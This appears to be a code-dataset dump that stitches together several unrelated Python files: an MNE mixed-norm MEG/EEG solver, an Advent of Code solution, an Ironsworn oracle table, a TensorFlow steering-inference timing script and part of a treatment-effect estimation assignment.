coordinate descent, and 'bcd' applies block coordinate descent.
'cd' is only available for fixed orientation.
n_mxne_iter : int
The number of MxNE iterations. If > 1, iterative reweighting
is applied.
return_residual : bool
If True, the residual is returned as an Evoked instance.
return_as_dipoles : bool
If True, the sources are returned as a list of Dipole instances.
dgap_freq : int or np.inf
The duality gap is evaluated every dgap_freq iterations. Ignored if
solver is 'cd'.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
stc : SourceEstimate | list of SourceEstimate
Source time courses for each evoked data passed as input.
residual : instance of Evoked
The residual a.k.a. data not explained by the sources.
Only returned if return_residual is True.
See Also
--------
tf_mixed_norm
References
----------
.. [1] A. Gramfort, M. Kowalski, M. Hamalainen,
"Mixed-norm estimates for the M/EEG inverse problem using accelerated
gradient methods", Physics in Medicine and Biology, 2012.
https://doi.org/10.1088/0031-9155/57/7/1937
.. [2] D. Strohmeier, Y. Bekhti, J. Haueisen, A. Gramfort,
"The Iterative Reweighted Mixed-Norm Estimate for Spatio-Temporal
MEG/EEG Source Reconstruction", IEEE Transactions of Medical Imaging,
Volume 35 (10), pp. 2218-2228, 2016.
"""
if not (0. <= alpha < 100.):
raise ValueError('alpha must be in [0, 100). '
'Got alpha = %s' % alpha)
if n_mxne_iter < 1:
raise ValueError('MxNE has to be computed at least 1 time. '
'Requires n_mxne_iter >= 1, got %d' % n_mxne_iter)
if dgap_freq <= 0.:
raise ValueError('dgap_freq must be a positive integer.'
' Got dgap_freq = %s' % dgap_freq)
if not isinstance(evoked, list):
evoked = [evoked]
_check_reference(evoked[0])
all_ch_names = evoked[0].ch_names
if not all(all_ch_names == evoked[i].ch_names
for i in range(1, len(evoked))):
raise Exception('All the datasets must have the same good channels.')
loose, forward = _check_loose_forward(loose, forward)
# put the forward solution in fixed orientation if it's not already
if loose == 0. and not is_fixed_orient(forward):
forward = convert_forward_solution(
forward, surf_ori=True, force_fixed=True, copy=True, use_cps=True)
gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked[0].info, noise_cov, pca, depth, loose, weights,
weights_min)
sel = [all_ch_names.index(name) for name in gain_info['ch_names']]
M = np.concatenate([e.data[sel] for e in evoked], axis=1)
# Whiten data
logger.info('Whitening data matrix.')
M = np.dot(whitener, M)
if time_pca:
U, s, Vh = linalg.svd(M, full_matrices=False)
if not isinstance(time_pca, bool) and isinstance(time_pca, int):
U = U[:, :time_pca]
s = s[:time_pca]
Vh = Vh[:time_pca]
M = U * s
# Scaling to make setting of alpha easy
n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
alpha_max = norm_l2inf(np.dot(gain.T, M), n_dip_per_pos, copy=False)
alpha_max *= 0.01
gain /= alpha_max
source_weighting /= alpha_max
if n_mxne_iter == 1:
X, active_set, E = mixed_norm_solver(
M, gain, alpha, maxit=maxit, tol=tol,
active_set_size=active_set_size, n_orient=n_dip_per_pos,
debias=debias, solver=solver, dgap_freq=dgap_freq, verbose=verbose)
else:
X, active_set, E = iterative_mixed_norm_solver(
M, gain, alpha, n_mxne_iter, maxit=maxit, tol=tol,
n_orient=n_dip_per_pos, active_set_size=active_set_size,
debias=debias, solver=solver, dgap_freq=dgap_freq, verbose=verbose)
if time_pca:
X = np.dot(X, Vh)
M = np.dot(M, Vh)
# Compute estimated whitened sensor data
M_estimated = np.dot(gain[:, active_set], X)
if mask is not None:
active_set_tmp = np.zeros(len(mask), dtype=np.bool)
active_set_tmp[mask] = active_set
active_set = active_set_tmp
del active_set_tmp
if active_set.sum() == 0:
raise Exception("No active dipoles found. alpha is too big.")
# Reapply weights to have correct unit
X = _reapply_source_weighting(X, source_weighting, active_set)
outs = list()
residual = list()
cnt = 0
for e in evoked:
tmin = e.times[0]
tstep = 1.0 / e.info['sfreq']
Xe = X[:, cnt:(cnt + len(e.times))]
if return_as_dipoles:
out = _make_dipoles_sparse(
Xe, active_set, forward, tmin, tstep,
M[:, cnt:(cnt + len(e.times))],
M_estimated[:, cnt:(cnt + len(e.times))], verbose=None)
else:
out = _make_sparse_stc(Xe, active_set, forward, tmin, tstep)
outs.append(out)
cnt += len(e.times)
if return_residual:
residual.append(_compute_residual(forward, e, Xe, active_set,
gain_info))
logger.info('[done]')
if len(outs) == 1:
out = outs[0]
if return_residual:
residual = residual[0]
else:
out = outs
if return_residual:
out = out, residual
return out
def _window_evoked(evoked, size):
"""Window evoked (size in seconds)."""
if isinstance(size, (float, int)):
lsize = rsize = float(size)
else:
lsize, rsize = size
evoked = evoked.copy()
sfreq = float(evoked.info['sfreq'])
lsize = int(lsize * sfreq)
rsize = int(rsize * sfreq)
lhann = signal.hann(lsize * 2)
rhann = signal.hann(rsize * 2)
window = np.r_[lhann[:lsize],
np.ones(len(evoked.times) - lsize - rsize),
rhann[-rsize:]]
evoked.data *= window[None, :]
return evoked
@verbose
def tf_mixed_norm(evoked, forward, noise_cov,
loose='auto', depth=0.8, maxit=3000,
tol=1e-4, weights=None, weights_min=None, pca=True,
debias=True, wsize=64, tstep=4, window=0.02,
return_residual=False, return_as_dipoles=False,
alpha=None, l1_ratio=None, dgap_freq=10, verbose=None):
"""Time-Frequency Mixed-norm estimate (TF-MxNE).
Compute L1/L2 + L1 mixed-norm solution on time-frequency
dictionary. Works with evoked data [1]_ [2]_.
Parameters
----------
evoked : instance of Evoked
Evoked data to invert.
forward : dict
Forward operator.
noise_cov : instance of Covariance
Noise covariance to compute whitener.
loose : float in [0, 1] | 'auto'
Value that weights the source variances of the dipole components
that are parallel (tangential) to the cortical surface. If loose
is 0 then the solution is computed with fixed orientation.
If loose is 1, it corresponds to free orientations.
The default value ('auto') is set to 0.2 for surface-oriented source
space and set to 1.0 for volumic or discrete source space.
depth: None | float in [0, 1]
Depth weighting coefficients. If None, no depth weighting is performed.
maxit : int
Maximum number of iterations.
tol : float
Tolerance parameter.
weights: None | array | SourceEstimate
Weight for penalty in mixed_norm. Can be None or
1d array of length n_sources or a SourceEstimate e.g. obtained
with wMNE or dSPM or fMRI.
weights_min: float
Do not consider in the estimation sources for which weights
is less than weights_min.
pca: bool
If True the rank of the data is reduced to true dimension.
debias: bool
Remove coefficient amplitude bias due to L1 penalty.
wsize: int or array-like
Length of the STFT window in samples (must be a multiple of 4).
If an array is passed, multiple TF dictionaries are used (each having
its own wsize and tstep) and each entry of wsize must be a multiple
of 4. See [3]_.
tstep: int or array-like
Step between successive windows in samples (must be a multiple of 2,
a divider of wsize and smaller than wsize/2) (default: wsize/2).
If an array is passed, multiple TF dictionaries are used (each having
its own wsize and tstep), and each entry of tstep must be a multiple
of 2 and divide the corresponding entry of wsize. See [3]_.
window : float or (float, float)
Length of time window used to take care of edge artifacts in seconds.
It can be one float or float if the values are different for left
and right window length.
return_residual : bool
If True, the residual is returned as an Evoked instance.
return_as_dipoles : bool
If True, the sources are returned as a list of Dipole instances.
alpha : float in [0, 100) or None
Overall regularization parameter.
If alpha and l1_ratio are not None, alpha_space and alpha_time are
overridden by alpha * alpha_max * (1. - l1_ratio) and alpha * alpha_max
* l1_ratio. 0 means no regularization, 100 would give 0 active dipole.
l1_ratio : float in [0, 1] or None
Proportion of temporal regularization.
If l1_ratio and alpha are not None, alpha_space and alpha_time are
overridden by alpha * alpha_max * (1. - l1_ratio) and alpha * alpha_max
* l1_ratio. 0 means no time regularization aka MxNE.
dgap_freq : int or np.inf
The duality gap is evaluated every dgap_freq iterations.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
stc : instance of SourceEstimate
Source time courses.
residual : instance of Evoked
The residual a.k.a. data not explained by the sources.
Only returned if return_residual is True.
See Also
--------
mixed_norm
References
----------
.. [1] A. Gramfort, D. Strohmeier, J. Haueisen, M. Hamalainen, M. Kowalski
"Time-Frequency Mixed-Norm Estimates: Sparse M/EEG imaging with
non-stationary source activations",
Neuroimage, Volume 70, pp. 410-422, 15 April 2013.
DOI: 10.1016/j.neuroimage.2012.12.051
.. [2] A. Gramfort, D. Strohmeier, J. Haueisen, M. Hamalainen, M. Kowalski
"Functional Brain Imaging with M/EEG Using Structured Sparsity in
Time-Frequency Dictionaries",
Proceedings Information Processing in Medical Imaging
Lecture Notes in Computer Science, Volume 6801/2011, pp. 600-611, 2011.
DOI: 10.1007/978-3-642-22092-0_49
.. [3] Y. Bekhti, D. Strohmeier, M. Jas, R. Badeau, A. Gramfort.
"M/EEG source localization with multiscale time-frequency dictionaries",
6th International Workshop on Pattern Recognition in Neuroimaging
(PRNI), 2016.
DOI: 10.1109/PRNI.2016.7552337
"""
_check_reference(evoked)
all_ch_names = evoked.ch_names
info = evoked.info
if not (0. <= alpha < 100.):
raise ValueError('alpha must be in [0, 100). '
'Got alpha = %s' % alpha)
if not (0. <= l1_ratio <= 1.):
raise ValueError('l1_ratio must be in range [0, 1].'
' Got l1_ratio = %s' % l1_ratio)
alpha_space = alpha * (1. - l1_ratio)
alpha_time = alpha * l1_ratio
if dgap_freq <= 0.:
raise ValueError('dgap_freq must be a positive integer.'
' Got dgap_freq = %s' % dgap_freq)
tstep = np.atleast_1d(tstep)
wsize = np.atleast_1d(wsize)
if len(tstep) != len(wsize):
raise ValueError('The same number of window sizes and steps must be '
'passed. Got tstep = %s and wsize = %s' %
(tstep, wsize))
loose, forward = _check_loose_forward(loose, forward)
# put the forward solution in fixed orientation if it's not already
if loose == 0. and not is_fixed_orient(forward):
forward = convert_forward_solution(
forward, surf_ori=True, force_fixed=True, copy=True, use_cps=True)
n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked.info, noise_cov, pca, depth, loose, weights,
weights_min)
if window is not None:
evoked = _window_evoked(evoked, window)
sel = [all_ch_names.index(name) for name in gain_info["ch_names"]]
M = evoked.data[sel]
# Whiten data
logger.info('Whitening data matrix.')
M = np.dot(whitener, M)
# Scaling to make setting of alpha easy
n_steps = np.ceil(M.shape[1] / tstep.astype(float)).astype(int)
n_freqs = wsize // 2 + 1
n_coefs = n_steps * n_freqs
phi = _Phi(wsize, tstep, n_coefs)
alpha_max = norm_epsilon_inf(gain, M, phi, l1_ratio, n_dip_per_pos)
alpha_max *= 0.01
gain /= alpha_max
source_weighting /= alpha_max
X, active_set, E = tf_mixed_norm_solver(
M, gain, alpha_space, alpha_time, wsize=wsize, tstep=tstep,
maxit=maxit, tol=tol, verbose=verbose, n_orient=n_dip_per_pos,
dgap_freq=dgap_freq, debias=debias)
if active_set.sum() == 0:
raise Exception("No active dipoles found. "
"alpha_space/alpha_time are too big.")
# Compute estimated whitened sensor data
M_estimated = np.dot(gain[:, active_set], X)
if mask is not None:
active_set_tmp = np.zeros(len(mask), dtype=np.bool)
active_set_tmp[mask] = active_set
active_set = active_set_tmp
del active_set_tmp
X = _reapply_source_weighting(X, source_weighting, active_set)
if return_residual:
residual = _compute_residual(
forward, evoked, X, active_set, gain_info)
if return_as_dipoles:
out = _make_dipoles_sparse(
X, active_set, forward, evoked.times[0], 1.0 / info['sfreq'],
M, M_estimated, verbose=None)
else:
out = _make_sparse_stc(
X, active_set, forward, evoked.times[0], 1.0 / info['sfreq'])
logger.info('[done]')
if return_residual:
out = out, residual
return out
| 38.008287
| 79
| 0.624355
|
4a15af0eb505ce4156da96a41ae624249becec94
| 1,299
|
py
|
Python
|
2021/day3.py
|
kdassharma/AdventOfCode
|
b11f4b481e9f24be9957faac415dcd4d04d93cba
|
[
"Apache-2.0"
] | 2
|
2020-12-02T06:01:37.000Z
|
2020-12-04T16:56:31.000Z
|
2021/day3.py
|
kdassharma/AdventOfCode2020
|
b11f4b481e9f24be9957faac415dcd4d04d93cba
|
[
"Apache-2.0"
] | null | null | null |
2021/day3.py
|
kdassharma/AdventOfCode2020
|
b11f4b481e9f24be9957faac415dcd4d04d93cba
|
[
"Apache-2.0"
] | null | null | null |
def findCommon(sequence):
count1s = 0
for bit in sequence:
if bit == "1":
count1s += 1
if count1s > len(sequence) / 2:
return "1"
if count1s == len(sequence) / 2:
return "-1"
return "0"
# Part 1
data = open('data/day3.txt')
bits = []
for i in range(12):
bits.append('')
for line in data:
for i in range(len(line.strip())):
bits[i] += line[i]
gamma = ""
for sequence in bits:
gamma += findCommon(sequence)
mask = 2**len(gamma) - 1
gamma_dec = int(gamma, 2)
epilson = ~gamma_dec & mask
print(gamma_dec*epilson)
# Part 2
from collections import Counter
data = open('data/day3.txt')
nums = []
for line in data:
nums.append(line.strip())
nums2 = nums.copy()
theta = ''
epsilon = ''
# Oxygen generator rating
for i in range(len(nums[0])):
common = Counter([x[i] for x in nums])
if common['0'] > common['1']:
nums = [x for x in nums if x[i] == '0']
else:
nums = [x for x in nums if x[i] == '1']
theta = nums[0]
# CO2 rating
for i in range(len(nums2[0])):
common = Counter([x[i] for x in nums2])
if common['0'] > common['1']:
nums2 = [x for x in nums2 if x[i] == '1']
else:
nums2 = [x for x in nums2 if x[i] == '0']
if nums2:
epsilon = nums2[0]
print(int(theta,2)*int(epsilon,2))
| 22.016949
| 43
| 0.576597
|
4a15b042d0bd457c5c81c42c20ed297f7267fa8c
| 3,057
|
py
|
Python
|
ironsworn/oracles.py
|
daniel-duliga/trpg-journal
|
6f7d68fafe60c0f053d1435d1894a3b3430eaf30
|
[
"MIT"
] | null | null | null |
ironsworn/oracles.py
|
daniel-duliga/trpg-journal
|
6f7d68fafe60c0f053d1435d1894a3b3430eaf30
|
[
"MIT"
] | null | null | null |
ironsworn/oracles.py
|
daniel-duliga/trpg-journal
|
6f7d68fafe60c0f053d1435d1894a3b3430eaf30
|
[
"MIT"
] | null | null | null |
from typing import List
from core import random_tables;
def _roll(oracle: List[str]):
print(random_tables.roll_table(oracle))
def action(): _roll([
'Scheme',
'Clash',
'Weaken',
'Initiate',
'Create',
'Swear',
'Avenge',
'Guard',
'Defeat',
'Control',
'Break',
'Risk',
'Surrender',
'Inspect',
'Raid',
'Evade',
'Assault',
'Deflect',
'Threaten',
'Attack',
'Leave',
'Preserve',
'Manipulate',
'Remove',
'Eliminate',
'Withdraw',
'Abandon',
'Investigate',
'Hold',
'Focus',
'Uncover',
'Breach',
'Aid',
'Uphold',
'Falter',
'Suppress',
'Hunt',
'Share',
'Destroy',
'Avoid',
'Reject',
'Demand',
'Explore',
'Bolster',
'Seize',
'Mourn',
'Reveal',
'Gather',
'Defy',
'Transform',
'Persevere',
'Serve',
'Begin',
'Move',
'Coordinate',
'Resist',
'Await',
'Impress',
'Take',
'Oppose',
'Capture',
'Overwhelm',
'Challenge',
'Acquire',
'Protect',
'Finish',
'Strengthen',
'Restore',
'Advance',
'Command',
'Refuse',
'Find',
'Deliver',
'Hide',
'Fortify',
'Betray',
'Secure',
'Arrive',
'Affect',
'Change',
'Defend',
'Debate',
'Support',
'Follow',
'Construct',
'Locate',
'Endure',
'Release',
'Lose',
'Reduce',
'Escalate',
'Distract',
'Journey',
'Escort',
'Learn',
'Communicate',
'Depart',
'Search',
'Charge',
'Summon'])
def theme(): _roll([
'Risk',
'Ability',
'Price',
'Ally',
'Battle',
'Safety',
'Survival',
'Weapon',
'Wound',
'Shelter',
'Leader',
'Fear',
'Time',
'Duty',
'Secret',
'Innocence',
'Renown',
'Direction',
'Death',
'Honor',
'Labor',
'Solution',
'Tool',
'Balance',
'Love',
'Barrier',
'Creation',
'Decay',
'Trade',
'Bond',
'Hope',
'Superstition',
'Peace',
'Deception',
'History',
'World',
'Vow',
'Protection',
'Nature',
'Opinion',
'Burden',
'Vengeance',
'Opportunity',
'Faction',
'Danger',
'Corruption',
'Freedom',
'Debt',
'Hate',
'Possession',
'Stranger',
'Passage',
'Land',
'Creature',
'Disease',
'Advantage',
'Blood',
'Language',
'Rumor',
'Weakness',
'Greed',
'Family',
'Resource',
'Structure',
'Dream',
'Community',
'War',
'Portent',
'Prize',
'Destiny',
'Momentum',
'Power',
'Memory',
'Ruin',
'Mysticism',
'Rival',
'Problem',
'Idea',
'Revenge',
'Health',
'Fellowship',
'Enemy',
'Religion',
'Spirit',
'Fame',
'Desolation',
'Strength',
'Knowledge',
'Truth',
'Quest',
'Pride',
'Loss',
'Law',
'Path',
'Warning',
'Relationship',
'Wealth',
'Home',
'Strategy',
'Supply'])
| 14.488152
| 43
| 0.460255
|
4a15b06b96d7841b3d18e85c256a84287684842b
| 3,928
|
py
|
Python
|
LAN2018Oct24/LANcar/test-model.py
|
lotusxai/LAN-Workshops
|
e795e87021642bb54cf5328d3589d438ccad266b
|
[
"MIT"
] | 1
|
2019-05-02T22:11:59.000Z
|
2019-05-02T22:11:59.000Z
|
LAN2018Oct24/LANcar/test-model.py
|
lotusxai/Hands-on-ML-Workshops
|
e795e87021642bb54cf5328d3589d438ccad266b
|
[
"MIT"
] | 2
|
2019-03-18T15:28:55.000Z
|
2019-03-18T15:29:24.000Z
|
LAN2018Oct24/LANcar/test-model.py
|
lotusxai/Hands-on-ML-Workshops
|
e795e87021642bb54cf5328d3589d438ccad266b
|
[
"MIT"
] | 1
|
2019-02-12T20:49:14.000Z
|
2019-02-12T20:49:14.000Z
|
#!/usr/bin/env python
from __future__ import division
import tensorflow as tf
import params
model = __import__(params.model)
import cv2
import subprocess as sp
import itertools
import sys
import os
import preprocess
import time
import math
import numpy as np
import local_common as cm
def deg2rad(deg):
return deg * math.pi / 180.0
def rad2deg(rad):
return 180.0 * rad / math.pi
#Get and set the number of cores to be used by TensorFlow
NCPU=int(sys.argv[1])
config = tf.ConfigProto(intra_op_parallelism_threads=NCPU, inter_op_parallelism_threads=NCPU, \
allow_soft_placement=True, device_count = {'CPU': 1})
#The max number of frames to be processed, and the number of frames already processed
NFRAMES = 1000
curFrame = 0
#Load the model
sess = tf.InteractiveSession(config=config)
saver = tf.train.Saver()
model_load_path = cm.jn(params.save_dir, params.model_load_file)
saver.restore(sess, model_load_path)
#List the epochs to be used for testing
epoch_ids = sorted(list(set(itertools.chain(*params.epochs.values()))))
epoch_ids = [6,6]
#Create lists for tracking operation timings
cap_time_list = []
prep_time_list = []
pred_time_list = []
tot_time_list = []
#Initialize the desired number of bandwidth co-runners with the given access type
numCR = int(sys.argv[2]) + 1
if numCR > 1:
numCR2 = numCR - 1
access = sys.argv[3]
accessCap = access.capitalize()
folderName = "+{}{}CR".format(numCR2, accessCap)
os.system('mkdir datafiles/{}CR/{}'.format(accessCap, folderName))
for i in range(1,numCR):
os.system('bandwidth -a {} -m 16384 -t 10000 -c {} &'.format(access,i))
#Process all epochs
for epoch_id in epoch_ids:
print '---------- processing video for epoch {} ----------'.format(epoch_id)
#Get the number of frames in the epoch
vid_path = cm.jn(params.data_dir, 'out-video-{}.avi'.format(epoch_id))
assert os.path.isfile(vid_path)
frame_count = cm.frame_count(vid_path)
cap = cv2.VideoCapture(vid_path)
machine_steering = []
#Process the current epoch while recording the operation execution times
print 'performing inference...'
time_start = time.time()
for frame_id in xrange(frame_count):
if curFrame < NFRAMES:
cam_start = time.time()
ret, img = cap.read()
assert ret
prep_start = time.time()
img = preprocess.preprocess(img)
pred_start = time.time()
rad = model.y.eval(feed_dict={model.x: [img]})[0][0]
deg = rad2deg(rad)
pred_end = time.time()
cam_time = (prep_start - cam_start)*1000
prep_time = (pred_start - prep_start)*1000
pred_time = (pred_end - pred_start)*1000
tot_time = (pred_end - cam_start)*1000
print 'pred: {:0.2f} deg. took: {:0.2f} ms | cam={:0.2f} prep={:0.2f} pred={:0.2f}'.format(deg, tot_time, cam_time, prep_time, pred_time)
if frame_id > 0:
tot_time_list.append(tot_time)
machine_steering.append(deg)
curFrame += 1
cap.release()
fps = frame_count / (time.time() - time_start)
print 'completed inference, total frames: {}, average fps: {} Hz'.format(frame_count, round(fps, 1))
#Interrupt all bandwidth co-runners
if numCR > 1:
os.system('killall -SIGINT bandwidth')
#Calculate and display statistics of the total inferencing times
print "count:", len(tot_time_list)
print "mean:", np.mean(tot_time_list)
print "max:", np.max(tot_time_list)
print "99.999pct:", np.percentile(tot_time_list, 99.999)
print "99.99pct:", np.percentile(tot_time_list, 99.99)
print "99.9pct:", np.percentile(tot_time_list, 99.9)
print "99pct:", np.percentile(tot_time_list, 99)
print "min:", np.min(tot_time_list)
print "median:", np.median(tot_time_list)
print "stdev:", np.std(tot_time_list)
| 31.934959
| 149
| 0.666242
|
4a15b0af19ec014b78e5a489484856f04dbcfa2d
| 74,409
|
py
|
Python
|
Estimating effect of drug combination on colon_cancer treatment.py
|
khanmustuffa11/AI-for-Medical-Treatment
|
03b9c5f84ea3b7ae4368f97770edc71f7d301b10
|
[
"MIT"
] | null | null | null |
Estimating effect of drug combination on colon_cancer treatment.py
|
khanmustuffa11/AI-for-Medical-Treatment
|
03b9c5f84ea3b7ae4368f97770edc71f7d301b10
|
[
"MIT"
] | null | null | null |
Estimating effect of drug combination on colon_cancer treatment.py
|
khanmustuffa11/AI-for-Medical-Treatment
|
03b9c5f84ea3b7ae4368f97770edc71f7d301b10
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# # Estimating Treatment Effect Using Machine Learning
# Welcome to the first assignment of **AI for Medical Treatment**!
#
# You will be using different methods to evaluate the results of a [randomized control trial](https://en.wikipedia.org/wiki/Randomized_controlled_trial) (RCT).
#
# **You will learn:**
# - How to analyze data from a randomized control trial using both:
# - traditional statistical methods
# - and the more recent machine learning techniques
# - Interpreting Multivariate Models
# - Quantifying treatment effect
# - Calculating baseline risk
# - Calculating predicted risk reduction
# - Evaluating Treatment Effect Models
# - Comparing predicted and empirical risk reductions
# - Computing C-statistic-for-benefit
# - Interpreting ML models for Treatment Effect Estimation
# - Implement T-learner
# ### This assignment covers the folowing topics:
#
# - [1. Dataset](#1)
# - [1.1 Why RCT?](#1-1)
# - [1.2 Data Processing](#1-2)
# - [Exercise 1](#ex-01)
# - [Exercise 2](#ex-02)
# - [2. Modeling Treatment Effect](#2)
# - [2.1 Constant Treatment Effect](#2-1)
# - [Exercise 3](#ex-03)
# - [2.2 Absolute Risk Reduction](#2-2)
# - [Exercise 4](#ex-04)
# - [2.3 Model Limitations](#2-3)
# - [Exercise 5](#ex-05)
# - [Exercise 6](#ex-06)
# - [3. Evaluation Metric](#3)
# - [3.1 C-statistic-for-benefit](#3-1)
# - [Exercise 7](#ex-07)
# - [Exercise 8](#ex-08)
# - [4. Machine Learning Approaches](#4)
# - [4.1 T-Learner](#4-1)
# - [Exercise 9](#ex-09)
# - [Exercise 10](#ex-10)
# - [Exercise 11](#ex-11)
# ## Packages
#
# We'll first import all the packages that we need for this assignment.
#
#
# - `pandas` is what we'll use to manipulate our data
# - `numpy` is a library for mathematical and scientific operations
# - `matplotlib` is a plotting library
# - `sklearn` contains a lot of efficient tools for machine learning and statistical modeling
# - `random` allows us to generate random numbers in python
# - `lifelines` is an open-source library that implements c-statistic
# - `itertools` will help us with hyperparameters searching
#
# ## Import Packages
#
# Run the next cell to import all the necessary packages, dependencies and custom util functions.
# In[1]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sklearn
import random
import lifelines
import itertools
plt.rcParams['figure.figsize'] = [10, 7]
# <a name="1"></a>
# ## 1 Dataset
# <a name="1-1"></a>
# ### 1.1 Why RCT?
#
# In this assignment, we'll be examining data from an RCT, measuring the effect of a particular drug combination on colon cancer. Specifically, we'll be looking the effect of [Levamisole](https://en.wikipedia.org/wiki/Levamisole) and [Fluorouracil](https://en.wikipedia.org/wiki/Fluorouracil) on patients who have had surgery to remove their colon cancer. After surgery, the curability of the patient depends on the remaining residual cancer. In this study, it was found that this particular drug combination had a clear beneficial effect, when compared with [Chemotherapy](https://en.wikipedia.org/wiki/Chemotherapy).
# <a name="1-2"></a>
# ### 1.2 Data Processing
# In this first section, we will load in the dataset and calculate basic statistics. Run the next cell to load the dataset. We also do some preprocessing to convert categorical features to one-hot representations.
# In[2]:
data = pd.read_csv("levamisole_data.csv", index_col=0)
# Let's look at our data to familiarize ourselves with the various fields.
# In[3]:
print(f"Data Dimensions: {data.shape}")
data.head()
# Below is a description of all the fields (one-hot means a different field for each level):
# - `sex (binary): 1 if Male, 0 otherwise`
# - `age (int): age of patient at start of the study`
# - `obstruct (binary): obstruction of colon by tumor`
# - `perfor (binary): perforation of colon`
# - `adhere (binary): adherence to nearby organs`
# - `nodes (int): number of lymphnodes with detectable cancer`
# - `node4 (binary): more than 4 positive lymph nodes`
# - `outcome (binary): 1 if died within 5 years`
# - `TRTMT (binary): treated with levamisole + fluoroucil`
# - `differ (one-hot): differentiation of tumor`
# - `extent (one-hot): extent of local spread`
# In particular pay attention to the `TRTMT` and `outcome` columns. Our primary endpoint for our analysis will be the 5-year survival rate, which is captured in the `outcome` variable.
# <a name='ex-01'></a>
# ### Exercise 01
#
# Since this is an RCT, the treatment column is randomized. Let's warm up by finding what the treatment probability is.
#
# $$p_{treatment} = \frac{n_{treatment}}{n}$$
#
# - $n_{treatment}$ is the number of patients where `TRTMT = True`
# - $n$ is the total number of patients.
# In[9]:
# UNQ_C1 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def proportion_treated(df):
"""
Compute proportion of trial participants who have been treated
Args:
df (dataframe): dataframe containing trial results. Column
'TRTMT' is 1 if patient was treated, 0 otherwise.
Returns:
result (float): proportion of patients who were treated
"""
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
proportion = sum(df.TRTMT ==1)/len(df.TRTMT)
### END CODE HERE ###
return proportion
# **Test Case**
# In[10]:
print("dataframe:\n")
example_df = pd.DataFrame(data =[[0, 0],
[1, 1],
[1, 1],
[1, 1]], columns = ['outcome', 'TRTMT'])
print(example_df)
print("\n")
treated_proportion = proportion_treated(example_df)
print(f"Proportion of patient treated: computed {treated_proportion}, expected: 0.75")
# Next let's run it on our trial data.
# In[11]:
p = proportion_treated(data)
print(f"Proportion Treated: {p} ~ {int(p*100)}%")
# <a name='ex-02'></a>
# ### Exercise 02
#
# Next, we can get a preliminary sense of the results by computing the empirical 5-year death probability for the treated arm versus the control arm.
#
# The probability of dying for patients who received the treatment is:
#
# $$p_{\text{treatment, death}} = \frac{n_{\text{treatment,death}}}{n_{\text{treatment}}}$$
#
# - $n_{\text{treatment,death}}$ is the number of patients who received the treatment and died.
# - $n_{\text{treatment}}$ is the number of patients who received treatment.
#
# The probability of dying for patients in the control group (who did not received treatment) is:
#
# $$p_{\text{control, death}} = \frac{n_{\text{control,death}}}{n_{\text{control}}}$$
# - $n_{\text{control,death}}$ is the number of patients in the control group (did not receive the treatment) who died.
# - $n_{\text{control}}$ is the number of patients in the control group (did not receive treatment).
#
# In[12]:
# UNQ_C2 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def event_rate(df):
'''
Compute empirical rate of death within 5 years
for treated and untreated groups.
Args:
df (dataframe): dataframe containing trial results.
'TRTMT' column is 1 if patient was treated, 0 otherwise.
'outcome' column is 1 if patient died within 5 years, 0 otherwise.
Returns:
treated_prob (float): empirical probability of death given treatment
untreated_prob (float): empirical probability of death given control
'''
treated_prob = 0.0
control_prob = 0.0
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
treated_prob = sum((df.TRTMT==1) &(df.outcome ==1))/sum(df.TRTMT)
control_prob = sum((df.TRTMT==0) &(df.outcome==1))/sum(df.TRTMT)
### END CODE HERE ###
return treated_prob, control_prob
# **Test Case**
# In[13]:
print("TEST CASE\ndataframe:\n")
example_df = pd.DataFrame(data =[[0, 1],
[1, 1],
[1, 1],
[0, 1],
[1, 0],
[1, 0],
[1, 0],
[0, 0]], columns = ['outcome', 'TRTMT'])
#print("dataframe:\n")
print(example_df)
print("\n")
treated_prob, control_prob = event_rate(example_df)
print(f"Treated 5-year death rate, expected: 0.5, got: {treated_prob:.4f}")
print(f"Control 5-year death rate, expected: 0.75, got: {control_prob:.4f}")
# Now let's try the function on the real data.
# In[14]:
treated_prob, control_prob = event_rate(data)
print(f"Death rate for treated patients: {treated_prob:.4f} ~ {int(treated_prob*100)}%")
print(f"Death rate for untreated patients: {control_prob:.4f} ~ {int(control_prob*100)}%")
# On average, it seemed like treatment had a positive effect.
#
# #### Sanity checks
# It's important to compute these basic summary statistics as a sanity check for more complex models later on. If they strongly disagree with these robust summaries and there isn't a good reason, then there might be a bug.
# ### Train test split
#
# We'll now try to quantify the impact more precisely using statistical models. Before we get started fitting models to analyze the data, let's split it using the `train_test_split` function from `sklearn`. While a hold-out test set isn't required for logistic regression, it will be useful for comparing its performance to the ML models later on.
# In[15]:
# As usual, split into dev and test set
from sklearn.model_selection import train_test_split
np.random.seed(18)
random.seed(1)
data = data.dropna(axis=0)
y = data.outcome
# notice we are dropping a column here. Now our total columns will be 1 less than before
X = data.drop('outcome', axis=1)
X_dev, X_test, y_dev, y_test = train_test_split(X, y, test_size = 0.25, random_state=0)
# In[16]:
print(f"dev set shape: {X_dev.shape}")
print(f"test set shape: {X_test.shape}")
# <a name="2"></a>
# ## 2 Modeling Treatment Effect
# <a name="2-1"></a>
# ### 2.1 Constant Treatment Effect
#
# First, we will model the treatment effect using a standard logistic regression. If $x^{(i)}$ is the input vector, then this models the probability of death within 5 years as
# $$\sigma(\theta^T x^{(i)}) = \frac{1}{1 + exp(-\theta^T x^{(i)})},$$
#
# where $ \theta^T x^{(i)} = \sum_{j} \theta_j x^{(i)}_j$ is an inner product.
#
# For example, if we have three features, $TRTMT$, $AGE$, and $SEX$, then our probability of death would be written as:
#
# $$\sigma(\theta^T x^{(i)}) = \frac{1}{1 + exp(-\theta_{TRTMT} x^{(i)}_{TRTMT} - \theta_{AGE}x_{AGE}^{(i)} - \theta_{SEX}x^{(i)}_{SEX})}.$$
#
# Another way to look at logistic regresion is as a linear model for the "logit" function, or "log odds":
#
